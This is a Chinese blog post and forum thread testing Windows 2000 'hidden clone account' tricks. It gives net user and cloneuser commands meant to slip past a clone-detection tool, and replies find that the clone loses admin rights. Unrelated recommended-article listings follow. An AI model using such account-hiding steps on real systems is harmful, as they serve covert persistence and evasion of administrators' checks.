隐形的克隆帐号测试(测试成功^_^)(ALLyeSNO)

最新推荐文章于 2026-02-06 00:49:23 发布
原创 最新推荐文章于 2026-02-06 00:49:23 发布 · 2k 阅读 · 0 ·
本内容遵循CC 4.0 BY-SA版权协议
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
标签
#测试 #user #c
博客主要讲述利用检测程序漏洞,通过比较注册表键值进行操作,如添加、删除用户账号等。还测试将原有管理员权限账号克隆后删除,发现原账号虽仍在管理员组但已无权限,提出可利用此做账号限制,并询问想法是否有瑕疵。

利用了 检测程序的漏洞

通过比较 注册表的 f 和 v键值

C:/WINNT/system32>net user allyesno babybear /add
命令成功完成。

C:/WINNT/system32>net localgroup administrators allyesno /add
命令成功完成。


C:/WINNT/system32>net user hideclone babybear /add
命令成功完成。


C:/WINNT/system32>cloneuser allyesno hideclone

C:/WINNT/system32>net user allyesno /delete
命令成功完成。

C:/WINNT/system32>net user hideclone
用户名 hideclone
本地组会员 *Users
全局组成员 *None
命令成功完成。

检测


[Melody]#checkclone

No Clone Is Found

Check Account Clone Complete

[Melody]#^_^ 成功



WinEggDrop
我怀疑被克隆的帐号是否还具有Administrators组的权限.


zzzevazzz
opentelnet
然后用hideclone登陆telnet,再尝试启动或停止服务。
如果可以,那就是admin。

WinEggDrop
it's not in Administrators group is the original account is deleted


allyesno
嗯 失去了 ad的权限 wineggdrop的置疑是正确的

另外倒是引出了 我的另一个思路 刚才已经测试过了

通过这个方法 将原有的ad权限帐号A 克隆成其他ad权限的帐号B

然后再把B进行删除 虽然 这个A帐号在查看的时候仍然是在administrators组 但是已经不具备ad权限 通过这个 可以做一些帐号限制

不知道 我这个想法 还有什么瑕疵吗?

面向对象程序设计教程(c++语言描述)第七章课后习题解题
qq_35315915的博客
06-23 2978
名词解释题函数模板:一个带类属参数的函数。类模板:一个带类属参数的类模板函数:通过参数实例化可以再构造出具体的函数。模板类:通过参数实例化可以再构造出具体的类。填空题(1) 函数模板类模板(2) template(3) class typename(4) 类属参数类似(5) 没有(6) 类模板(7) 顺序容器关联容器(8) 输入迭代器输出迭代器前向迭代器双向迭代器随机访问迭代器选择题(1) A (...
面向对象程序设计教程(c++语言描述)第八章课后习题解题
qq_35315915的博客
06-23 1961
名词解释题函数模板:一个带类属参数的函数。类模板:一个带类属参数的类模板函数:通过参数实例化可以再构造出具体的函数。模板类:通过参数实例化可以再构造出具体的类。填空题(1) 函数模板类模板(2) template(3) class typename(4) 类属参数类似(5) 没有(6) 类模板(7) 顺序容器关联容器(8) 输入迭代器输出迭代器前向迭代器双向迭代器随机访问迭代器选择题(1) A (...
克隆帐户终结篇修正版
afterain的专栏
07-25 822
序:相信大家都用过克隆帐户吧。无论是用工具还是用手工,克隆帐户无疑是隐藏帐户的最好选择。但是看见网上的文章都讲的特别麻烦。这样那样的。其实克隆帐户很简单。就是复制administrator的注册表项。本篇文章针对已经使用过克隆的用户,不针对对克隆帐户一无所知者。我只讲述下克隆的原理方法。希望对大家有所启发。原理:我们的帐户在注册表里都有他相应的键,具体在“[HKEY_LOCAL_M
注册表基本知识
weixin_30897079的博客
12-07 306
1.如何打开注册表? 答:运行中输入regedit.exe 无权限限制 2.注册表数据库文件的存放位置? 答:2000/XP注册表文件按功能来分,由系统注册表文件用户注册表文件两类组成的 系统设置缺省用户配置数据存放在系统/系统文件夹/SYSTEM32/CONFIG文件夹下的6个文件, DEFAULT、SAM、SECURITY、SOFTWARE、USERDIFFSYS...
如何检查计算机账号克隆
weixin_34238633的博客
08-14 1535
如何检查计算机账号克隆 simeon    随着个人计算机安全意识的提高,网络***程序的生命周期越来越短,而如果要对***软件进行免杀,必须掌握软件加壳、修改特征码等技术。对于网络上的计算机,特别是网络服务器,当成功控制以后,对账号进行克隆基本上已经存在***者的惯例,使用无形无影的“克隆用户”,在系统管理员更改系统账号以后,使用克隆用户账号登陆并重新控制系统是一个非常不错的选择,本文对就自...
输入控制符
lichangyu2011的专栏
11-03 899
scanf("\n%*c%d",&m);  完美解决了nyoj 第
小白友好:Qwen3-TTS语音合成常见问题解答
最新发布
weixin_26805451的博客
02-06 76
本文介绍了如何在星图GPU平台上自动化部署【声音设计】Qwen3-TTS-12Hz-1.7B-VoiceDesign镜像,快速实现高质量多语种语音合成。用户无需配置环境,通过WebUI输入文本并描述音色,即可一键生成自然、有情感的配音音频,典型应用于短视频配音、课件语音化及电商商品解说等场景。
()迅雷C++试题及解答
guoyiqi
06-13 127
1.下列程序的输出结果为:(B)#include<iostream.h>void main(){ char* a[ ] = { "hello", "the", "world"}; char** pa = a; pa++; cout<<”*pa<<endl; } A) theworld B) the C) ello D) ellothewo..
C++入门系列 (初见c++)
2401_87909443的博客
10-14 530
本章作为作者学习复习笔记总结 欢迎大家给予建议与指正目录简易的程序(案例来自CPP书籍)C++预处理器iostream文件 名称空间(对应 using namespace std)使用 using namespace std 使用std::注意⚠️解释"::"意思"<<"与">>"1. 输出流 <<(流插入运算符)2. 输入流 >>(流提取运算符)控制符与换行符控制符endl换行符\n 观察上述代码能够发现 其有很多内容是在c语言中未体现出来的 让我们对他进行编译得到:Come up and C++
迅雷C++试题及解答
cjsycyl的专栏
05-24 787
原文 1.下列程序的输出结果为:(B) #include void main() {        char* a[ ] = { "hello", "the", "world"};        char** pa = a;        pa++;        cout } A) theworld    B) the   C) ello    D) ellotheworld
2007迅雷招聘网上试题及解答
hfer的专栏
05-17 326
1.下列程序的输出结果为:(B) #include&lt;iostream.h&gt; void main() { char* a[ ] = { "hello", "the", "world"}; char** pa = a; pa++; cout&lt;&lt;”*pa&lt;&lt;endl; }  A) theworld    B) t..
Java学习笔记(疯狂Java讲义第三版)——接口
weixin_45359980的博客
07-13 186
接口:可以简单的理解成特殊的抽象类。 先看接口的定义语法 [修饰符] interface 接口名 { //零个到多个常量定义 //零个到多个抽象方法定义 //零个到多个内部类、内部接口、内部枚举类定义 //零个到多个默认方法或类方法定义 } 对于定义接口时的修饰符,只能是public不写(即默认为default访问权限)。 接口名的规则定义类名时候的规则一样,只是推荐使用英文中的形容词。 接口...
LaTeX使用--基本语法
星.云计算
06-03 2049
  1.LaTeX文件的框架如下:     /documentclass{article}  /begin{document}  This is the body of the article  /end{document}    如果是中文,将/documentstyle{article}改为  /documentstyle{carticle}     第一句:/documentclass[选项...
C++面向对象程序设计课后习题完整解答与实战解析
weixin_42593549的博客
09-22 599
类是C++中实现面向对象编程的核心单元,通过class关键字定义,封装了数据成员成员函数。基本语法如下:public:int age;std::cout << "姓名: " << name << ", 年龄: " << age << std::endl;该示例定义了一个Student类,包含两个公有成员变量一个成员函数。在C++中,虚函数通过virtual关键字声明,允许派生类对其进行重写(override)。一旦函数被声明为虚函数,其后续在派生类中的同名函数即使不加。
C/C++专项练习 ()
my_adu的专栏
10-25 1718
1.若有以下程序 #include int f(int a[ ],int n) { if(n > 1) { int t; t=f(a, n-1); return t > a[ n -1 ] ? t:a[n-1]; } else return a[0]; } main() { int a
latex基本语法
liuchang0001的专栏
09-01 435
LaTex基本语法      1.LaTeX文件的框架如下:      \documentclass{article}   \begin{document}   This is the body of the article ...
备战秋招 | 笔试强训11
Nice_W的博客
07-21 164
比如26,26不相等,6比较大,因此6往上找父亲3,接着继续比较还是不相同,3比较大,继续向上找父亲1,还是继续比较还是不同,2比较大,2往上找父亲1,此时再比较,相同,故1是他们的最近公共祖先;C选项,静态数据成员也属于类的成员,只要是类的成员都会被访问限定符限定;思路:本题主要是考察对位运算的使用,这里我们定义一个当前1的个数,与1的最大个数,用1与目标数字的每个比特位进行,如果遇到遇到1就给当前1的个数的变量反复++,遇到0,就开始于最大1个数进行比较,若大于则更新最大连续1的个数;
终极指南:5分钟快速上手SakuraLLM开源ACGN翻译神器
gitblog_00063的博客
11-17 1396
SakuraLLM是一款专为ACGN(动画、漫画、游戏、轻小说)领域打造的开源翻译模型,能够精准地进行日语到中文的轻小说Galgame翻译。无论你是ACGN爱好者还是内容创作者,这款强大的翻译工具都能帮你轻松跨越语言障碍,沉浸在日本二次元文化的精彩世界中 🌸 ## ✨ 为什么选择SakuraLLM? **开源免费** - SakuraLLM完全开源且免费使用,遵循CC BY-NC-SA 4
matlab tex语法,latex基本语法
weixin_39624700的博客
03-18 1083
LaTex基本语法      1.LaTeX文件的框架如下:      \documentclass{article}   \begin{document}   This is the body of the article   \end{document}      如果是中文,将\documentstyle{article}改为   \documentstyle{carticle}      ...
Java程序设计实训项目完整参考答案与解析
weixin_42588555的博客
10-07 976
类是Java中用于定义对象模板的蓝图,它规定了对象所具备的属性(成员变量)行为(成员方法)。一个类可以被看作是一种自定义的数据类型,它不占用运行时内存空间,只有当通过new关键字创建其实例时,才会生成具体的对象并分配堆内存。// 成员变量:表示学生的属性// 构造方法:初始化对象状态// 成员方法:表示学生的行为System.out.println(name + "正在学习...");
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值